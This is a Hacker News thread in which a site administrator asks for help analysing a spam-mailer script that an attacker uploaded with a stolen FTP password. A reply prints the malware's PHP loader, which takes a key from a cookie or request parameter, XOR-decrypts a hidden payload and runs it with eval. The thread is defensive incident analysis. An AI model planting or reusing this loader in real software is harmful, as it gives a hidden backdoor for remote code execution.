Hacker News new | past | comments | ask | show | jobs | submit login
Ask HN: Can you decrypt this evil thing?
7 points by noduerme on Jan 6, 2012 | hide | past | web | favorite | 4 comments
The back story is, someone got a stolen FTP password to a client's account on a shared server and uploaded this. It's some kind of darkmailer, since I spent the next three days getting that server off blacklists. It doesn't look like the attacker got access outside the account. The account's been cleaned out, but I still don't know what else this might have done. I got one level of deobfuscation in -- that's the easy part -- but it looks like it takes an input string to decrypt what's inside that. There are two parts, one in PHP and the other in perl.



The code is obfuscated as ascii characters in the $e variable. It uses the PHP function 'cor' to 'decrypt' the code (I think the same method is used in evil.pl).

The PHP code is:

if (!@isset($_SERVER)) { $_COOKIE = &$HTTP_COOKIE_VARS; $_POST = &$HTTP_POST_VARS; $_GET = &$HTTP_GET_VARS; } $k = $_COOKIE['key']; if (empty($k)) { $k = $_POST['key']; } if (empty($k)) { $k = $_GET['key']; } if (!@function_exists('decrypt')) { eval('function decrypt($e,$k){if(!$k){return;}$el=@strlen($e);$kl=@strlen($k);$rl=$el%$kl;$fl=$el-$rl;for($o=0;$o<$fl;$o+=$kl){$p=@substr($e,$o,$kl);$d.="$k"^"$p";}if($rl){$p=@substr($e,$fl,$rl);$k=@substr($k,0,$rl);$d.="$k"^"$p";}return($d);}'); } $d = @decrypt($d, $k); eval($d);

For PHP script, the key is:


and decrypted evil script is here:


I didn't look at perl script.

And here's decrypted perl script: http://pastebin.com/7RDpTXDp

It does almost the same thing as PHP script, and uses the same key :P

Thank you!!!!!

Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact